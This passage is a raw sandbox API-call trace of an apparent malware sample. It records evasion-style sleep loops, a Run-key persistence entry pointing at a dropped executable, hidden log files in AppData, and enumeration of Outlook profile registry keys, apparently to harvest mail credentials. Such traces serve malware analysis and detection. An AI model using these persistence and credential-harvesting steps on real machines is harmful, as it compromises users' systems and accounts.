BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0235.769] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0236.171] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0236.172] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0236.495] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0236.495] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0236.811] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0236.811] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0236.890] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0236.891] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0237.158] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0237.159] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0237.178] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x19ea50 | out: TokenHandle=0x19ea50*=0x100) returned 0x0 [0237.178] NtQueryInformationToken (in: TokenHandle=0x100, TokenInformationClass=0x14, TokenInformation=0x19ea48, TokenInformationLength=0x4, ReturnLength=0x19ea4c | out: TokenInformation=0x19ea48, ReturnLength=0x19ea4c) returned 0x0 [0237.178] NtClose (Handle=0x100) returned 0x0 [0237.178] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea20, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0237.178] NtCreateFile (in: FileHandle=0x19ea40, DesiredAccess=0x12019f, ObjectAttributes=0x19ea08*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea28, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea40*=0x0, IoStatusBlock=0x19ea28*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0237.179] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x42b008) returned 1 [0237.179] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea10, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0237.179] NtCreateFile (in: FileHandle=0x19ea30, DesiredAccess=0x120089, ObjectAttributes=0x19e9f8*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea18, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea30*=0x0, IoStatusBlock=0x19ea18*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0237.179] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x42b008) returned 1 [0237.180] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x19e620 | out: TokenHandle=0x19e620*=0x100) returned 0x0 [0237.181] NtQueryInformationToken (in: TokenHandle=0x100, TokenInformationClass=0x1, TokenInformation=0x19de18, TokenInformationLength=0x400, ReturnLength=0x19e618 | out: TokenInformation=0x19de18, ReturnLength=0x19e618) returned 0x0 [0237.181] ConvertSidToStringSidW (in: Sid=0x19de20*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x2f)), StringSid=0x19e61c | out: StringSid=0x19e61c*="S-1-5-21-4219442223-4223814209-3835049652-1000") returned 1 [0237.181] NtClose (Handle=0x100) returned 0x0 [0237.907] NtCreateKey (in: KeyHandle=0x19ea58, DesiredAccess=0x2021f, ObjectAttributes=0x19e61c*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea58*=0x0) returned 0xc0000022 [0237.907] NtCreateKey (in: KeyHandle=0x19ea58, DesiredAccess=0x2021f, ObjectAttributes=0x19e61c*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea58*=0x100) returned 0x0 [0239.673] NtSetValueKey (in: KeyHandle=0x100, ValueName="HZ7TPFNPENC0", TitleIndex=0x0, Type=0x1, Data="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", DataSize=0x64 | out: Data="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe") returned 0x0 [0239.675] NtClose (Handle=0x100) returned 0x0 [0239.675] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea24, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0239.675] NtCreateFile (in: FileHandle=0x19ea44, DesiredAccess=0x12019f, ObjectAttributes=0x19ea0c*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea2c, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x1, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea44*=0x0, IoStatusBlock=0x19ea2c*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0239.675] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x42b008) returned 1 [0239.675] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea14, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0239.676] NtCreateFile (in: FileHandle=0x19ea34, DesiredAccess=0x120089, ObjectAttributes=0x19e9fc*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea1c, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea34*=0x0, IoStatusBlock=0x19ea1c*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0239.676] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x42b008) returned 1 [0239.677] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W", NtPathName=0x19ea34, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0239.677] NtCreateFile (in: FileHandle=0x19ea54, DesiredAccess=0x100181, ObjectAttributes=0x19ea1c*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea3c, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x21, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea54*=0x100, IoStatusBlock=0x19ea3c*(Status=0x0, Pointer=0x0, Information=0x2)) returned 0x0 [0239.679] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x42b008) returned 1 [0239.679] NtQueryInformationFile (in: FileHandle=0x100, IoStatusBlock=0x19ea3c, FileInformation=0x19e9dc, Length=0x28, FileInformationClass=0x4 | out: IoStatusBlock=0x19ea3c, FileInformation=0x19e9dc) returned 0x0 [0239.683] NtSetInformationFile (FileHandle=0x100, IoStatusBlock=0x19ea3c, FileInformation=0x19e9dc, Length=0x28, FileInformationClass=0x4) returned 0x0 [0239.683] NtClose (Handle=0x100) returned 0x0 [0239.684] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlog.ini", NtPathName=0x19ea24, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlog.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0239.684] NtCreateFile (in: FileHandle=0x19ea44, DesiredAccess=0x12019f, ObjectAttributes=0x19ea0c*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlog.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea2c, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea44*=0x100, IoStatusBlock=0x19ea2c*(Status=0x0, Pointer=0x0, Information=0x2)) returned 0x0 [0239.685] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x42b008) returned 1 [0239.685] NtClose (Handle=0x100) returned 0x0 [0239.687] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x19e3bc | out: TokenHandle=0x19e3bc*=0x100) returned 0x0 [0239.687] NtQueryInformationToken (in: TokenHandle=0x100, TokenInformationClass=0x1, TokenInformation=0x19dbb4, TokenInformationLength=0x400, ReturnLength=0x19e3b4 | out: TokenInformation=0x19dbb4, ReturnLength=0x19e3b4) returned 0x0 [0239.687] ConvertSidToStringSidW (in: Sid=0x19dbbc*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x2f)), StringSid=0x19e3b8 | out: StringSid=0x19e3b8*="S-1-5-21-4219442223-4223814209-3835049652-1000") returned 1 [0239.687] NtClose (Handle=0x100) returned 0x0 [0239.687] NtCreateKey (in: KeyHandle=0x19ea30, DesiredAccess=0x20219, ObjectAttributes=0x19e3b8*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea30*=0x0) returned 0xc0000034 [0239.687] NtCreateKey (in: KeyHandle=0x19ea30, DesiredAccess=0x20219, ObjectAttributes=0x19e3b0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook\\", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea30*=0x0) returned 0xc0000034 [0239.688] NtCreateKey (in: KeyHandle=0x19ea30, DesiredAccess=0x20219, ObjectAttributes=0x19e3cc*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea30*=0x100) returned 0x0 [0239.688] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtPathName=0x19e2a8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0239.688] NtCreateFile (in: FileHandle=0x19e2c8, DesiredAccess=0x120089, ObjectAttributes=0x19e290*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e2b0, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e2c8*=0x0, IoStatusBlock=0x19e2b0*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc0000034 [0239.688] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x42b008) returned 1 [0239.688] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtPathName=0x19e2c0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0239.688] NtCreateFile (in: FileHandle=0x19e2e0, DesiredAccess=0x12019f, ObjectAttributes=0x19e2a8*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e2c8, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e2e0*=0x108, IoStatusBlock=0x19e2c8*(Status=0x0, Pointer=0x0, Information=0x2)) returned 0x0 [0239.689] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x42b008) returned 1 [0239.689] NtQueryInformationFile (in: FileHandle=0x108, IoStatusBlock=0x19e2c8, FileInformation=0x19e220, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x19e2c8, FileInformation=0x19e220) returned 0x0 [0239.694] NtWriteFile (in: FileHandle=0x108, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0x19e2c8, Buffer=0x422670*, Length=0x28, ByteOffset=0x19e238*=0, Key=0x0 | out: IoStatusBlock=0x19e2c8, Buffer=0x422670*) returned 0x0 [0239.695] NtClose (Handle=0x108) returned 0x0 [0239.701] NtEnumerateKey (in: KeyHandle=0x100, Index=0x0, KeyInformationClass=0x0, KeyInformation=0x19df80, Length=0x200, ResultLength=0x19e3c8 | out: KeyInformation=0x19df80, ResultLength=0x19e3c8) returned 0x0 [0239.701] NtCreateKey (in: KeyHandle=0x19e3d4, DesiredAccess=0x20219, ObjectAttributes=0x19d738*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\0a0d020000000000c000000000000046", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19e3d4*=0x108) returned 0x0 [0239.701] NtEnumerateKey (in: KeyHandle=0x108, Index=0x0, KeyInformationClass=0x0, KeyInformation=0x19db80, Length=0x400, ResultLength=0x19e3dc | out: KeyInformation=0x19db80, ResultLength=0x19e3dc) returned 0x8000001a [0239.701] NtClose (Handle=0x108) returned 0x0 [0239.701] NtEnumerateKey (in: KeyHandle=0x100, Index=0x1, KeyInformationClass=0x0, KeyInformation=0x19df80, Length=0x200, ResultLength=0x19e3c8 | out: KeyInformation=0x19df80, ResultLength=0x19e3c8) returned 0x0 [0239.701] NtCreateKey (in: KeyHandle=0x19e3d4, DesiredAccess=0x20219, ObjectAttributes=0x19d738*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\13dbb0c8aa05101a9bb000aa002fc45a", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19e3d4*=0x108) returned 0x0 [0239.701] NtEnumerateKey (in: KeyHandle=0x108, Index=0x0, KeyInformationClass=0x0, KeyInformation=0x19db80, Length=0x400, ResultLength=0x19e3dc | out: KeyInformation=0x19db80, ResultLength=0x19e3dc) returned 0x8000001a [0239.701] NtClose (Handle=0x108) returned 0x0 [0239.701] NtEnumerateKey (in: KeyHandle=0x100, Index=0x2, KeyInformationClass=0x0, KeyInformation=0x19df80, Length=0x200, ResultLength=0x19e3c8 | out: KeyInformation=0x19df80, ResultLength=0x19e3c8) returned 0x0 [0239.701] NtCreateKey (in: KeyHandle=0x19e3d4, DesiredAccess=0x20219, ObjectAttributes=0x19d738*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\22165c4f0be62c48b2e3e9aef6ce3db3", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19e3d4*=0x108) returned 0x0 [0239.702] NtEnumerateKey (in: KeyHandle=0x108, Index=0x0, KeyInformationClass=0x0, KeyInformation=0x19db80, Length=0x400, ResultLength=0x19e3dc | out: KeyInformation=0x19db80, ResultLength=0x19e3dc) returned 0x8000001a [0239.702] NtClose (Handle=0x108) returned 0x0 [0239.702] NtEnumerateKey (in: KeyHandle=0x100, Index=0x3, KeyInformationClass=0x0, KeyInformation=0x19df80, Length=0x200, ResultLength=0x19e3c8 | out: KeyInformation=0x19df80, ResultLength=0x19e3c8) returned 0x0 [0239.702] NtCreateKey (in: KeyHandle=0x19e3d4, DesiredAccess=0x20219, ObjectAttributes=0x19d738*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\3517490d76624c419a828607e2a54604", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19e3d4*=0x108) returned 0x0 [0239.702] NtEnumerateKey (in: KeyHandle=0x108, Index=0x0, KeyInformationClass=0x0, KeyInformation=0x19db80, Length=0x400, ResultLength=0x19e3dc | out: KeyInformation=0x19db80, ResultLength=0x19e3dc) returned 0x8000001a [0239.702] NtClose (Handle=0x108) returned 0x0 [0239.702] NtEnumerateKey (in: KeyHandle=0x100, Index=0x4, KeyInformationClass=0x0, KeyInformation=0x19df80, Length=0x200, ResultLength=0x19e3c8 | out: KeyInformation=0x19df80, ResultLength=0x19e3c8) returned 0x0 [0239.702] NtCreateKey (in: KeyHandle=0x19e3d4, DesiredAccess=0x20219, ObjectAttributes=0x19d738*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\4b31ac339b3c6047a5607d10314f5a05", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19e3d4*=0x108) returned 0x0 [0239.702] NtEnumerateKey (in: KeyHandle=0x108, Index=0x0, KeyInformationClass=0x0, KeyInformation=0x19db80, Length=0x400, ResultLength=0x19e3dc | out: KeyInformation=0x19db80, ResultLength=0x19e3dc) returned 0x8000001a [0239.702] NtClose (Handle=0x108) returned 0x0 [0239.702] NtEnumerateKey (in: KeyHandle=0x100, Index=0x5, KeyInformationClass=0x0, KeyInformation=0x19df80, Length=0x200, ResultLength=0x19e3c8 | out: KeyInformation=0x19df80, ResultLength=0x19e3c8) returned 0x0 [0239.702] NtCreateKey (in: KeyHandle=0x19e3d4, DesiredAccess=0x20219, ObjectAttributes=0x19d738*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\81fb1dc666658c4bb96e792ef5ce3051", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19e3d4*=0x108) returned 0x0 [0239.702] NtEnumerateKey (in: KeyHandle=0x108, Index=0x0, KeyInformationClass=0x0, KeyInformation=0x19db80, Length=0x400, ResultLength=0x19e3dc | out: KeyInformation=0x19db80, ResultLength=0x19e3dc) returned 0x8000001a [0239.702] NtClose (Handle=0x108) returned 0x0 [0239.703] NtEnumerateKey (in: KeyHandle=0x100, Index=0x6, KeyInformationClass=0x0, KeyInformation=0x19df80, Length=0x200, ResultLength=0x19e3c8 | out: KeyInformation=0x19df80, ResultLength=0x19e3c8) returned 0x0 [0239.703] NtCreateKey (in: KeyHandle=0x19e3d4, DesiredAccess=0x20219, ObjectAttributes=0x19d738*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8503020000000000c000000000000046", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19e3d4*=0x108) returned 0x0 [0239.703] NtEnumerateKey (in: KeyHandle=0x108, Index=0x0, KeyInformationClass=0x0, KeyInformation=0x19db80, Length=0x400, ResultLength=0x19e3dc | out: KeyInformation=0x19db80, ResultLength=0x19e3dc) returned 0x8000001a [0239.703] NtClose (Handle=0x108) returned 0x0 [0239.703] NtEnumerateKey (in: KeyHandle=0x100, Index=0x7, KeyInformationClass=0x0, KeyInformation=0x19df80, Length=0x200, ResultLength=0x19e3c8 | out: KeyInformation=0x19df80, ResultLength=0x19e3c8) returned 0x0 [0239.703] NtCreateKey (in: KeyHandle=0x19e3d4, DesiredAccess=0x20219, ObjectAttributes=0x19d738*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9207f3e0a3b11019908b08002b2a56c2", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19e3d4*=0x108) returned 0x0 [0239.703] NtEnumerateKey (in: KeyHandle=0x108, Index=0x0, KeyInformationClass=0x0, KeyInformation=0x19db80, Length=0x400, ResultLength=0x19e3dc | out: KeyInformation=0x19db80, ResultLength=0x19e3dc) returned 0x8000001a [0239.703] NtClose (Handle=0x108) returned 0x0 [0239.703] NtEnumerateKey (in: KeyHandle=0x100, Index=0x8, KeyInformationClass=0x0, KeyInformation=0x19df80, Length=0x200, ResultLength=0x19e3c8 | out: KeyInformation=0x19df80, ResultLength=0x19e3c8) returned 0x0 [0239.703] NtCreateKey (in: KeyHandle=0x19e3d4, DesiredAccess=0x20219, ObjectAttributes=0x19d738*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19e3d4*=0x108) returned 0x0 [0239.703] NtEnumerateKey (in: KeyHandle=0x108, Index=0x0, KeyInformationClass=0x0, KeyInformation=0x19db80, Length=0x400, ResultLength=0x19e3dc | out: KeyInformation=0x19db80, ResultLength=0x19e3dc) returned 0x0 [0239.703] NtCreateKey (in: KeyHandle=0x19e3d0, DesiredAccess=0x20219, ObjectAttributes=0x19d738*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19e3d0*=0x104) returned 0x0 [0239.706] NtEnumerateValueKey (in: KeyHandle=0x104, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19d780, Length=0x400, ResultLength=0x19e3dc | out: KeyValueInformation=0x19d780, ResultLength=0x19e3dc) returned 0x0 [0239.706] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtPathName=0x19d688, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0239.706] NtCreateFile (in: FileHandle=0x19d6a8, DesiredAccess=0x12019f, ObjectAttributes=0x19d670*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19d690, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, 